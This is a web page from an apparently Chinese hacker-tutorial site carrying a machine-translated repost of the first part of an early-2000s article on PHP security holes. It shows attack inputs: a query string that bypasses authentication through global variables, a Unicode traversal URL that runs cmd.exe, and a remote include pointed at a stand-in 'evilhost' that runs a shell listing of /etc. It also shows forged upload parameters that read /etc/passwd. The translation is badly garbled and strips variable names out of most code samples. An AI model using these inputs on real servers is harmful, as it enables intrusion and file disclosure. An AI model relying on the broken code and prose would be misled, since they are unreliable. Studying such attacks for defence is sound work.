How carries on the attack to in the PHP procedure common loophole (on) |http://www.cshu.net




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  How  | the hackerfile>> invasionanalysis >> carries on the 
                  attack to in the PHP procedure common loophole (on)  Printing

            How carries on the attack to in the PHP procedure common loophole 
            (on)
            Www.cshu.net  2002-8-18  fog rain village 

              How carries on the attack to in the PHP procedure common loophole 
              (on) 
              Original: Shaun Clowes <http://www.securereality.com.au/> 
              Translation: Analysist <http://www.nsfocus.com/> 
              Therefore translates this article, is because at present all is 
              takes Perl about the CGI secure article to take the example, but 
              specially introduces ASP, PHP or the JSP secure article rules are 
              very few. Shaun Clowes this article quite comprehensively 
              introduced the PHP security problem, the original text may find in 
              http://www.securereality.com.au/studyinscarlet.txt. 
              Because the original text quite is long, moreover has quite a part 
              is introduced the article the background or the PHP foundation 
              knowledge, has not involved to the PHP security aspect content, 
              therefore I do not have the translation. If you want to understand 
              this aspect the knowledge, please refer to the original text. 
              The article mainly from the overall situation variable, the 
              long-distance document, the document uploads, the storehouse 
              document, the Session document, the data type and was easy the 
              function these aspects which made a mistake to analyze the PHP 
              security, how and to strengthened PHP the security to put forward 
              some useful proposals. 
              Good, the idle talk little said, we return to the proper topic! 
              [ Overall situation variable ] 
              In the PHP variable does not need beforehand to state, they can 
              when the first use the automatic foundation, their type does not 
              need to assign, they can act according to the context environment 
              automatic determination. Looked from programmer's angle that, this 
              is one extremely convenient processing method without doubt. Very 
              obviously, this also is a fast development language very useful 
              characteristic. Once a variable was founded, may in the procedure 
              any place use. This characteristic causes the result is the 
              programmer very little initialization variable, after all, when 
              their first foundation, they are spatial. 
              Very obviously, generally all is accepts the user based on the PHP 
              application procedure main function the input (mainly is table 
              single variable, uploads document and Cookie and so on), then 
              carries on processing to the input data, then returns to the 
              result to the customer end browser. In order to make the PHP code 
              visit user the input to be as far as possible easy, in fact PHP is 
              regards as these input data the overall situation variable to 
              process. 
              For example: 
              <FORM METHOD= "GET" ACTION= "test.php" > 
              <INPUT TYPE= "TEXT" NAME= "hello" > 
              <INPUT TYPE= "SUBMIT" > 
              </FORM> 
              Very obviously, this can demonstrate a text frame and submits the 
              button. When the user clicks submits the button, "test.php" can 
              process the user the input, when "test.php" movement, "" can 
              contain the user the data which inputs in the text frame. Should 
              see from here us, the aggressor may defer to own wish to found the 
              free overall situation variable. If the aggressor is not transfers 
              "test.php" through the table single input, but directly inputs 
              http://server/test.php in the browser address fence? 
              Hello=hi&setup=no, then, continues is "" is founded, "" also is 
              founded. 
              The translator pours: These two methods also are we usually say 
              "POST" and "GET" the method. 
              The under user authentication code has exposed the security 
              problem which the PHP overall situation variable causes: 
              <? Php 
              If ($$PP Ss == "hello") 
              = 1; 
              ... 
              If (== 1) 
              Echo "some important information"; 
              ? > 
              The above code first inspects the user the password whether is 
              "hello", if matches, the establishment "" is "1", namely through 
              authentication. If "" is afterwards "1", can demonstrate some 
              important information. 
              The surface looks like is correct, moreover in us has quite part 
              of people is does this, but this section of code violated had 
              thought the natural mistake, it supposed "" in has not established 
              the value time is spatial, actually had not thought the aggressor 
              was allowed to found any overall situation variable and the 
              evaluation, passed "http://server/test.php similar? Auth=1 "the 
              method, we definitely may deceive this section of code, causes it 
              to believe we were already have authenticated. 
              Therefore, in order to enhance the PHP procedure the security, we 
              cannot believe any has not been clear about the definition the 
              variable. If in procedure variable very many, this but an 
              extremely arduous duty. 
              One commonly used protection way is inspects array HTTP_GET [ ] or 
              POST_VARS [ ] the center variable, this relies on to us submits 
              the way (GET or POST). When PHP disposition for opens "track_vars" 
              the option speech (this is lacks province value), the user submits 
              the variable may obtain in the array which the overall situation 
              variable and above mentioned. 
              But is worth explaining, PHP has four different arrays variables 
              to use for to process the user the input. The HTTP_GET_VARS array 
              uses for the variable which processes the GET way to submit, the 
              HTTP_POST_VARS array uses in the variable which processes the POST 
              way to submit, the HTTP_COOKIE_VARS array uses in to process the 
              variable which submits as cookie, but (quite new PHP only then 
              provides) regarding the HTTP_POST_FILES array, then completely is 
              the user uses for to submit the variable one kind to be possible 
              to choose the way. A user's request may be very easy to exist the 
              variable in these four arrays, therefore a safe PHP procedure 
              should inspect these four arrays. 
              [ Long-distance document ] 
              PHP is one kind has the rich characteristic language, has provided 
              the massive functions, makes the programming realization some 
              function to be very easy. But looked from the safe angle that, 
              function more, must guarantee its security is more difficult, the 
              long-distance document is explains this question a very good 
              example: 
              <? Php 
              If (! (= fopen ("", "r")) 
              Echo ("Could not open file: \n>"); 
              ? > 
              The above script attempts to open the document "", if is defeated 
              on the demonstration wrong information. Very obvious, if we can 
              assign "", can use in this script browsing system any document. 
              But, this script also has a not too obvious characteristic, that 
              is it may reads from any other WEB or the FTP stand takes the 
              document. In fact, the PHP majority file processing function to 
              long-distance document processing is transparent. 
              For example: 
              If assigns "" is "http://target/scripts/.. %c1%1c.. 
              /winnt/system32/cmd.exe? /c+dir " 
              Then the above code is in fact uses on main engine target the 
              unicode loophole, has carried out the dir order. 
              This causes the support long-distance document include (), require 
              (), include_once () and require_once () changes in the context 
              environment interesting. These function main functions are contain 
              assign the document the content, and explained them according to 
              the PHP code, mainly is uses in the storehouse document. 
              For example: 
              <? Php 
              Include ( Bdir."/languages.php"); 
              ? > 
              On in example " Bdir "generally was in carries out the way which 
              in front of the code already established, if the aggressor could 
              cause" Bdir "not the speech which establishes, then he may change 
              this way. But the aggressor certainly cannot handle any matter, 
              because they only can assigns in them in the way visits document 
              languages.php (in perl "Poison null byte" to attack to the PHP 
              function). But because had to the long-distance document support, 
              the aggressor may handle any matter. For example, the aggressor 
              may put document languages.php on some server, contains the 
              following content: 
              <? Php 
              Passthru ("/bin/ls /etc"); 
              ? > 
              Then " Bdir "establishes as" http://<evilhost>/ "above, like this 
              we may carry out the attack code on the goal main engine," /etc 
              "the table of contents content returns as the result to in the 
              customer browser. 
              Needs to pay attention, attacks the server (also is evilhost) 
              should not be able to carry out the PHP code, otherwise the attack 
              code can attack the server, but is not the goal server execution, 
              if you want to understand the concrete technical detail, please 
              refer: Http://www.securereality.com.au/sradv00006.txt 
              [ Document uploads ] 
              The PHP automatic support uploads based on the RFC 1,867 documents 
              under, we look at the example: 
              <FORM METHOD= "POST" ENCTYPE= "multipart/form-data" > 
              <INPUT TYPE= "FILE" NAME= "hello" > 
              <INPUT TYPE= "HIDDEN" NAME= "MAX_FILE_SIZE" VALUE= "10,240" > 
              <INPUT TYPE= "SUBMIT" > 
              </FORM> 
              The above code lets the user choose a document from the local 
              machine, after clicks submits, the document can upload the server. 
              This obviously is the very useful function, but the PHP response 
              way causes this function to change is unsafe. When PHP first time 
              receives this kind of request, even starts in it to analyze in 
              front of the PHP code which transfers, it can first accept the 
              long-distance user the document, the inspection document length 
              whether does surpass "variable" the definition value, if through 
              these tests, the document can exist in a local temporary table of 
              contents. 
              Therefore, aggressor's may transmit the free document for to move 
              the PHP main engine, in the PHP procedure had not decided whether 
              accepts when the document uploads, the document is already had on 
              the server. 
              Here I did not discuss using the document upload carry on the DOS 
              attack to the server the possibility. 
              Let us consider processes the PHP procedure which the document 
              uploads, just like above us said, the document is received and 
              exists on the server (position is assigns in disposition document, 
              generally is /tmp), the extension generally is stochastic, similar 
              "phpxXuoXG" form. The PHP procedure needs to upload the document 
              the information in order to processes it, this could through two 
              ways, one way be in 3 already uses in PHP, another kind was in 
              after us the before method proposed the safe announcement 
              introduced. 
              But, we may firmly say, the question or exists, the majority PHP 
              procedure or uses the old way to process uploads the document. PHP 
              established four overall situations variables to describe uploads 
              the document, for instance said the example above: 
              = Filename on local machine (e.g "/tmp/phpxXuoXG") 
              = Size in bytes of file (e.g 1,024) 
              = The original name of the file on the remote system (e.g 
              "c:\\temp\\hello.txt") 
              = Mime type of uploaded file (e.g "text/plain") 
              Then the PHP procedure starts the document which processes the 
              basis "" to assign, the question lies in "" not necessarily is a 
              PHP establishment variable, any long-distance users all may assign 
              it. Under if we use the way: 
              Http://vulnhost/vuln.php? 
              Hello=/etc/passwd&hello_size=10240&hello_type=text/plain&hello_name=hello.txt 

              Caused the under PHP overall situation variable (certainly the 
              POST way also to be allowed (even to be Cookie)): 
              = "/etc/passwd" 
              = 10,240 
              = "text/plain" 
              = "hello.txt" 
              The above table odd number according to has happen to satisfied 
              the variable which the PHP procedure expected, by now but the PHP 
              procedure no longer processed the document which uploaded, but was 
              processing "/etc/passwd" (usually can cause content exposition). 
              This kind of attack may use in to expose any sensitive document 
              the content. 
              I already said in front, new edition PHP uses HTTP_POST_FILES [ ] 
              to decide uploads the document, simultaneously also provided very 
              many functions to solve this problem, for example had a function 
              to use for the document which judged some document is actually 
              uploads. These function very good solution this questions, but 
              definitely had the very many PHP procedure still to use the old 
              method in fact, was very easy to come under this kind of attack. 
              A method of attack variety uploads which as the document, we look 
              at one after next surface section of codes: 
              <? Php 
              If (file_exists ()) // Checks the file exists on the local system 
              (no remote files) 
              Include (""); 
              ? > 
              If the aggressor may control "", very obviously it may use "" 
              reads takes on the long-distance system any document. Aggressor's 
              ultimate objective is carries out the random order on the 
              long-distance server, but he is unable to use the long-distance 
              document, therefore, he must result in on the long-distance server 
              founds a PHP document. This gets up resembles will be not 
              impossible at first sight, but the document uploaded has helped us 
              this busy, if the aggressor first founded on the local machine to 
              contain the PHP code the document, then founded contained "theme" 
              named the document territory table list, finally used this table 
              list to upload through the document the foundation contains the 
              PHP code the document to submit for the above code, PHP can the 
              document which submitted the aggressor preserve, and "" the value 
              established the document which submitted for the aggressor, such 
              file_exists () the function could inspect passes, aggressor's code 
              also will carry out. 
              After obtains carries out the random order ability, the aggressor 
              obviously wants to promote the jurisdiction or is exploits the 
              victory, but this needs on some servers no tool collection, but 
              the document uploaded once again has helped us this busy. The 
              aggressor may use the document to upload the function to upload 
              the tool, has them on the server, then uses them to carry out the 
              instruction ability, uses chmod () to change the document the 
              jurisdiction, then execution. For example: The aggressor may 
              bypass the firewall or IDS uploads a local root attack procedure, 
              then the execution, has like this obtained the root jurisdiction. 
              < To be continued > 



              Original author: Analysist (analyst) 
              Origin: Http://www.china4lert.org 
              Altogether has 41 readers to read this article 

              [Tells friend] 
            Previous article:Carries on the attack using the mysql spatial 
            password 

            Next article:The malicious homepage "ten crimes" the analysis with 
            melt 

            - this week popular article - related article 
            PHP-Nuke in the mailattach.php document passes on the loophole
            How carries on the attack to in the PHP procedure common loophole 
            (next)
            How carries on the attack to in the PHP procedure common loophole 
            (on)



      CSHU 
